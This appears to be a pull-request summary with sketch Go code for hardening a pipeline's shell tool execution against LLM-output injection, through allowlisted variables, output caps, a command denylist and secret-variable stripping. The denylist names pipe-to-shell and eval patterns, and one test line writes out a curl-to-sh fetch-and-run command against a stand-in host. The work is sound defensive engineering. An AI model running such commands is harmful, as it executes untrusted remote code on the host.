📒 Files selected for processing (5)
- CLAUDE.md
- agent/exec/local.go
- pipeline/handlers/tool.go
- pipeline/handlers/tool_safety.go
- pipeline/handlers/tool_test.go
✅ Files skipped from review due to trivial changes (1)
- pipeline/handlers/tool_test.go
🚧 Files skipped from review as they are similar to previous changes (3)
- pipeline/handlers/tool_safety.go
- agent/exec/local.go
- CLAUDE.md
Summary
P0 critical security fix. Implements four defense-in-depth layers for tool_command execution safety, preventing LLM output injection into shell commands and protecting against malicious .dip files.
Layer 1: Safe-key allowlist (primary security boundary)
Variable expansion in `tool_command` now uses a fail-closed allowlist: only `outcome`, `preferred_label`, `human_response`, and `interview_answers` can be interpolated from `ctx.*`. All LLM-origin keys (`last_response`, `tool_stdout`, `response.*`, etc.) are blocked with an actionable error message. `human_response` is classified as safe (user keyboard input, not LLM output).

Layer 2: Output size limits
Tool stdout/stderr is capped at 64KB per stream (configurable via the `output_limit` node attr). The hard ceiling is 10MB; only the `--max-output-limit` CLI flag can raise it. A thread-safe `limitedBuffer` appends a truncation marker.

Layer 3: Command denylist/allowlist
A built-in denylist blocks dangerous patterns (eval, pipe-to-shell, curl|sh). Matching is per-statement (splits on `;`, `&&`, `||`, and newlines) and case-insensitive. The denylist is non-overridable by .dip files; only the `--bypass-denylist` CLI flag can disable it. An optional allowlist is available via `--tool-allowlist` or the `tool_commands_allow` graph attr.

Layer 4: Environment variable stripping
Sensitive env vars (`*_API_KEY`, `*_SECRET`, `*_TOKEN`, `*_PASSWORD`) are stripped from tool subprocesses. Override with `TRACKER_PASS_ENV=1`.

CLI flags
- `--tool-allowlist` — comma-separated glob patterns for allowed commands
- `--bypass-denylist` — disable the built-in denylist (use with caution)
- `--max-output-limit` — hard ceiling for output capture

Design review
Spec reviewed by a 6-expert security panel (offensive, defensive, Go security, pipeline security, usability, backward compat). Key design changes from review:

- `human_response` reclassified as safe (user input, not LLM)

Test plan
- `TestExpandVariables_ToolCommandMode_BlocksLLMOutput` — `last_response` blocked
- `TestExpandVariables_ToolCommandMode_AllowsHumanResponse` — user input safe
- `TestExpandVariables_ToolCommandMode_BlocksResponsePrefix` — `response.*` blocked
- `TestExpandVariables_ToolCommandMode_AllowsGraphAndParams` — author-controlled keys safe
- `TestExecCommandWithLimit_Truncates` — output capped with marker
- `TestCheckCommandDenylist` — 12 cases including compound commands
- `TestCheckCommandAllowlist` — pattern restriction
- `TestBuildToolEnv_StripsAPIKeys` — sensitive vars removed
- `TestToolHandler_BlocksTaintedVariable` — integration: tainted var → error
- `TestToolHandler_AllowsSafeVariable` — integration: safe var works
- `TestToolHandler_DenylistBlocks` — integration: curl|sh → error

Closes #16
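Layer 1's fail-closed allowlist can be sketched as follows. This is a minimal illustration, not the project's `ExpandVariables`: the `{{ctx.key}}` template syntax and the `expandToolCommand` name are assumptions.

```go
package main

import (
	"fmt"
	"regexp"
)

// Hypothetical sketch of the Layer 1 safe-key allowlist. Any ctx.* key
// not listed here is refused, so new LLM-origin keys are blocked by default.
var safeCtxKeys = map[string]bool{
	"outcome":           true,
	"preferred_label":   true,
	"human_response":    true, // user keyboard input, not LLM output
	"interview_answers": true,
}

var ctxVar = regexp.MustCompile(`\{\{ctx\.([a-zA-Z0-9_.]+)\}\}`)

// expandToolCommand interpolates only allowlisted ctx.* keys and fails
// closed on everything else with an actionable error.
func expandToolCommand(cmd string, ctx map[string]string) (string, error) {
	var expandErr error
	out := ctxVar.ReplaceAllStringFunc(cmd, func(m string) string {
		key := ctxVar.FindStringSubmatch(m)[1]
		if !safeCtxKeys[key] {
			expandErr = fmt.Errorf(
				"ctx.%s may carry LLM output and cannot be used in tool_command", key)
			return m
		}
		return ctx[key]
	})
	return out, expandErr
}

func main() {
	if _, err := expandToolCommand("echo {{ctx.last_response}}", nil); err == nil {
		panic("expected last_response to be blocked")
	}
	out, err := expandToolCommand("echo {{ctx.outcome}}", map[string]string{"outcome": "pass"})
	if err != nil || out != "echo pass" {
		panic("safe-key expansion failed")
	}
	fmt.Println("ok")
}
```

The fail-closed shape matters: an unrecognized key is an error, not a silent pass-through, so forgetting to classify a new context key cannot widen the injection surface.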
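Layer 2's capped buffer hinges on one detail called out in the review fixes: `Write` must report `len(p)` even when it truncates, or the child process sees a short-write error. A minimal sketch (the real `limitedBuffer` may differ in field names and marker text):

```go
package main

import (
	"fmt"
	"sync"
)

// limitedBuffer is a sketch of a thread-safe capped output buffer.
// Write always claims the full write so the producing process is not
// disturbed; excess bytes are simply dropped and a marker is recorded.
type limitedBuffer struct {
	mu        sync.Mutex
	buf       []byte
	limit     int
	truncated bool
}

func (b *limitedBuffer) Write(p []byte) (int, error) {
	b.mu.Lock()
	defer b.mu.Unlock()
	if remaining := b.limit - len(b.buf); remaining > 0 {
		if len(p) > remaining {
			b.buf = append(b.buf, p[:remaining]...)
			b.truncated = true
		} else {
			b.buf = append(b.buf, p...)
		}
	} else if len(p) > 0 {
		b.truncated = true
	}
	return len(p), nil // always report a full write, even on truncation
}

func (b *limitedBuffer) String() string {
	b.mu.Lock()
	defer b.mu.Unlock()
	if b.truncated {
		return string(b.buf) + "\n[output truncated]"
	}
	return string(b.buf)
}

func main() {
	b := &limitedBuffer{limit: 5}
	n, _ := b.Write([]byte("hello world"))
	fmt.Println(n, b.String())
}
```

A buffer like this can be handed to `exec.Cmd`'s Stdout/Stderr directly, which is how a per-stream cap stays independent of the command being run.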
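Layer 3's per-statement matching can be sketched like this. The splitting and case-insensitive glob matching follow the description above; the pattern list and helper names are illustrative, not the shipped denylist.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Statements are split on ;, &&, ||, and newlines before matching, so a
// dangerous command cannot hide behind a benign prefix like "echo hi && ...".
var statementSplit = regexp.MustCompile(`;|&&|\|\||\n`)

// Illustrative patterns only; see tool_safety.go for the real denylist.
var denyPatterns = []string{"curl * | sh", "* | sh *", "* | bash *", "eval *"}

// matchGlob translates a simple "*" glob into a case-insensitive regexp.
func matchGlob(pattern, s string) bool {
	parts := strings.Split(pattern, "*")
	for i := range parts {
		parts[i] = regexp.QuoteMeta(parts[i])
	}
	re := regexp.MustCompile("(?i)^" + strings.Join(parts, ".*") + "$")
	return re.MatchString(s)
}

func checkDenylist(cmd string) error {
	for _, stmt := range statementSplit.Split(cmd, -1) {
		stmt = strings.TrimSpace(stmt)
		for _, pat := range denyPatterns {
			if matchGlob(pat, stmt) {
				return fmt.Errorf("blocked by denylist pattern %q: %s", pat, stmt)
			}
		}
	}
	return nil
}

func main() {
	if err := checkDenylist("echo hi && curl http://example.test/x.sh | sh"); err == nil {
		panic("expected pipe-to-sh to be blocked")
	}
	fmt.Println("pipe-to-sh blocked; plain ls allowed:", checkDenylist("ls -la") == nil)
}
```

Note that a single `|` is not a statement separator here: pipes stay inside one statement, which is exactly why the `* | sh *`-style patterns are needed.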
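Layer 4's environment filtering is conceptually a suffix match over `os.Environ()`. A sketch, with the filtering split out so it is testable; the real `buildToolEnv` may differ in details:

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// Suffixes considered sensitive, per the patterns described above.
var sensitiveSuffixes = []string{"_API_KEY", "_SECRET", "_TOKEN", "_PASSWORD"}

// filterEnv drops any NAME=value pair whose NAME ends in a sensitive suffix.
func filterEnv(environ []string) []string {
	var out []string
	for _, kv := range environ {
		name, _, _ := strings.Cut(kv, "=")
		sensitive := false
		for _, suffix := range sensitiveSuffixes {
			if strings.HasSuffix(name, suffix) {
				sensitive = true
				break
			}
		}
		if !sensitive {
			out = append(out, kv)
		}
	}
	return out
}

// buildToolEnv applies the filter unless TRACKER_PASS_ENV=1 opts out
// for trusted environments.
func buildToolEnv() []string {
	if os.Getenv("TRACKER_PASS_ENV") == "1" {
		return os.Environ()
	}
	return filterEnv(os.Environ())
}

func main() {
	fmt.Println(filterEnv([]string{"OPENAI_API_KEY=x", "HOME=/home/u", "DB_PASSWORD=y"}))
	// → [HOME=/home/u]
}
```

The resulting slice is what gets passed as the subprocess environment, so secrets in the parent process never reach tool commands by default.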
🤖 Generated with Claude Code